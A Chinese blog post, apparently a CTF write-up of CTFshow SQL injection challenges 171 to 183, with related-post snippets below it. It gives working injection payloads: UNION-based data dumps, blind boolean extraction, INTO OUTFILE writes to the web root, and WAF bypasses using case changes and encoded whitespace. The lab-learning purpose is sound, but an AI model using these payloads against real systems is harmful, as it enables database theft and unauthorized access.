CTFSHOW-WEB入门SQL注入部分(大概是长期更新)

最新推荐文章于 2025-02-25 19:59:45 发布
最新推荐文章于 2025-02-25 19:59:45 发布
阅读量649 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lleo1/article/details/113525664
本文分享了作者在解决一系列CTF比赛中的SQL注入题目的过程,包括基础SQL注入手法、使用不同编码方式绕过WAF、利用文件写入及特殊字符绕过等技巧,并附有具体案例解析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQL注入


不一定会所有题都放上来(懒) 但是我尽量

0x01 web 171

在这里插入图片描述
总算是开始刷sql注入题了 之前学了 但是没写几题 也算个纯萌新了 所以基础题会细一点 也为了加强自己记忆在这里插入图片描述
1,2,3都能回显 继续直接爆表名

1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+

在这里插入图片描述
直接爆字段 记得ctfshow_user要加'' 我试了半天不知道哪出问题 还得去翻Y4大佬的博客才发现问题 tcl

1' union select 1,2,column_name from information_schema.columns where table_name='ctfshow_user'  --+

在这里插入图片描述
然后就拿到了

1' union select id,username,password from ctfshow_user --+

0x02 web172

先放个撸猫界面源码里的注释
在这里插入图片描述
然后看题 发现已经给了表名ctfshow_user2

我自己的莫名其妙方法

随便试试回显在这里插入图片描述
然后 我好像莫名其妙干出来了
1' union select 1,password from ctfshow_user2 --+ 直接出了 但是
1' union select username,password from ctfshow_user2 --+出不来
应该是按照题目给的 username叫flag 所以查询语句查不出 但是直接干password就行

下来是Y4大佬的解法

不能有flag字段 所以尝试用编码 这里大佬用的是base64和hex
-1' union select to_base64(username),hex(password) from ctfshow_user2 --+ 然后拿最后一行解码 拿到flag
Y4👴tql

0x03 web173

同上

0x04 web174(已补)

先前因为脚本水平太辣了 导致跳过了本题 后来看了各路大佬的脚本之后 就尝试写了一下脚本 这里就不贴了 跑了2分钟才出答案的脚本实在太垃圾了 算了 放一条脚本中爆破的那句话 懂了原理 你也就会写脚本了(这是payload 也就是在sql查询中的语句 他的if语句是true返回第一个 错了返回第二个)

?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),%d,1))<%d,'nice','dddd') -- -"%(i,j)

0x05 web 175

1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--

写进目录 访问即可

0x06 web176

不知道waf是啥 就猜 发现union select不行 然后夏姬八试 发现好像是过滤了select 这里可以直接利用大小写过滤

1' union Select 1,password,3 from ctfshow_user --+

然后从Y4👴的blog里面发现 可以直接万能密码1' or 1=1--+ 我还是tcl

0x07 web177-179(久违的更新 摸鱼人回来补题辣)

177-178
大概过滤了空格和注释 用url编码绕了 万能语句通杀
1'or%091=1%23

179
emmmm 可能是群主的waf少加了一个%0c?

1'or%0c1=1%23

顺便在别人的博客发现 原来万能密码可以不用空格也行 feng师傅tql
顺便atao师傅tql(偌大的ctfshow竟然只有我是fw)

1'or'1'='1'%23

0x08 web 180-182

似乎是%23被过滤掉了 至于为什么payload是id=26 我也没明白
因为到22开始就没有回显了 为什么不猜22呢

(后来看到有大佬用burp跑出来的26

首先是群主的payload(第一个单引号前需要输入一个没有的数)
180181通杀

111'or(id=26)and'1'='1

原理是看了feng师傅的博客
通过上面给的查询语句来构造

1.where username !='flag' and id = ''or(id=26)and'1'='1' limit 1;";
 and优先级>or也就是
2.(username !='flag' and id = '')  or  (id=26and'1'='1')

where输出的是1那条 所以出来了(我还是tcl)
然后还有一种就是

-1'||id='26'||'   这个语句大伙把他带入搜索语句里面就懂了

0x09 web183

首先看博客学习regexp()

ctfshow web入门 sql注入
HoAd'blog
02-10 759
ctfshow web入门 sql注入 171 正常的手工注入过程 查数据库 1' union select 1,database(),3-- - 查表名 1' union select 1,table_name,3 from information_schema.tables where table_schema=database() -- - 查列名 1' union select 1,column_name,3 from information_schema.columns where table
CTF web入门SQL注入
最新发布
qq_41701460的博客
04-15 949
HAVING子句用于对聚合数据进行筛选。它通常与GROUP BY一起使用。主要用于聚合函数的条件过滤,可以组合多个条件。十六进制:可以前面加x,后面用引号包裹或者0x;也可以和算数运算结合表示数字。#binascii 库:用于进行二进制数据和 ASCII 编码之间的转换,在本代码中主要用于将字符串转换为十六进制字符串。#requests 库:用于发送 HTTP 请求,在代码里会用它向目标网站发送 POST 请求来进行 SQL 注入尝试。#定义将字符串转换为十六进制字符串的函数。
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 5830
ctfshow 靶场 web入门 sql注入系列
CTFshow——web入门——sql注入
h_adam的博客
03-14 7017
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
CTFshow-WEB入门-SQL注入()
feng的博客
02-08 1979
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
ctfshow web入门--sql注入
2402_87078084的博客
02-25 369
或者:1' union select 1,database(),3--+闭合方式确定后测试回显位置,发现有3列(到4时报错)不报错,所以接下来尝试。
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 471
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 386
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
CTFShow-web入门WriteUp(长期更新
子推的Blog
03-26 773
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 645
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1227
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
ctfshow web 入门 sql注入
wsitcj的博客
02-23 325
171、常规题型(需要把前面数字换为-1,注释用 --+) 查数据库 payload = “-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+” 查列名 payload="-1’union select 1,2,group_concat(column_name) from information_schema.columns where ta
ctfshow-web入门-sql注入web191-web195)
Welcome To Myon'Blog !
08-07 1289
我们不指定第三个参数,就可以实现和 left 和 right 一样的效果。密码只能是数字,过滤了空格,采用反引号包裹绕过,题目已经说了是堆叠注入,这里直接修改用户名和密码:
ctfshow web入门 sql注入(持续更新
Lum1n0us's Blog
07-13 1474
文章目录web171web172web173web174web175web176web177web178 web171 第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。 1' order by 3-- - -1' union select 1,2,3-- - # 库名是ctfshow_web -1' union select 1,database(),3-- - # 表名是ctfshow_user -1' union select 1,group_concat(table_name),3 fro
ctfshowweb入门sql注入
jie_a的博客
05-29 244
芜湖,刚刚考完科目三,又是开始学习的一天 web184 之前的懒得重新写了, 这里用"right join"右连接来把两个表连接起来进行查询pass字段,后面的单引号可以用16进制编码绕过 RIGHT JOIN(右连接) 用于获取右表所有记录,即使左表没有对应匹配的记录 过滤了where 所以我们用 on 过滤了单引号 所以我们用char(99) =c char表 :char表 回显43; 然后我们写个脚本 import requests url='http://1f6a8d55-3dd2-4924-a
ctfshow-web入门-sql注入web196-web200)堆叠注入
Welcome To Myon'Blog !
08-08 715
这里把 create 和 drop 都过滤了,那么我们直接用 insert 插入来覆盖 pass 和 username 的值。其中 $row[0] 表示从数据库查询结果中提取的某一行的第一个字段值,我们可以使用 select 来设置$row[0] 的值,再提交我们设置的 password 满足两者相等,payload:还是堆叠注入,显示过滤了 select 实际并没有。
ctfshow笔记WEBsqlSQL
m0_46625346的博客
08-04 491
web171 使用SQL语句 1’ order by 3-- -回显正常 而使用SQL语句 1’ order by 4-- -显示错误,这说明共3个字段。 1’ union select 1,database(),3-- - 库名database( )出来了:ctfshow_web 1’ union select 1,3,group_concat(table_name) from information_schema.tables where table_schema=‘ctfshow_web-- -
ctfshow web入门 sql注入wp(未完)
weixin_49436541的博客
03-08 6345
ctfshow sql注入
ctfshow web入门 sql注入175
03-23
### CTFShow Web 入门 SQL 注入 第175题 解法 CTFShow 平台中的 Web 入门级别 SQL 注入题目旨在帮助学习者掌握不同场景下的 SQL 注入技巧。对于第 175 题,其核心在于利用无过滤注入的特点来完成攻击目标。 #### 背景分析 在该题目中,查询语句允许通过 `UNION SELECT` 构造额外的数据集并将其写入到指定文件路径下[^2]。具体来说,攻击者可以借助此特性提取数据库内的敏感数据,并将这些数据存储至可访问的位置以便后续查看。 以下是实现这一过程的关键点: 1. **构造 UNION 查询** 使用 `UNION SELECT` 将目标表中的字段值附加到原始查询结果集中。例如,在本题中可以通过如下方式获取用户密码: ```sql 1' union select 1, password from ctfshow_user5 -- ``` 2. **导出数据到外部文件** 利用 MySQL 的 `INTO OUTFILE` 子句将查询结果保存为服务器上的文件。这一步骤需要确保所选路径具有写权限以及符合服务端配置的安全策略。 ```sql INTO OUTFILE '/var/www/html/1.txt' ``` 3. **绕过潜在限制** 如果存在单引号 `'` 或其他字符被转义的情况,则需采用替代方法构建有效载荷。比如使用双划线 (`--`) 表示注释从而忽略剩余部分;或者尝试基于时间盲注等方式间接验证逻辑条件成立与否。 最终提交完整的请求参数形式可能类似于下面这样: ```plaintext id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'-- ``` 成功执行上述操作之后,可通过浏览器访问 `/1.txt` 文件读取其中的内容即为目标 flag 值。 #### 总结 此类题目主要考察选手对基础 SQL 注入原理的理解程度及其实际应用能力。通过对真实环境模拟练习能够加深印象进而提升防御意识水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值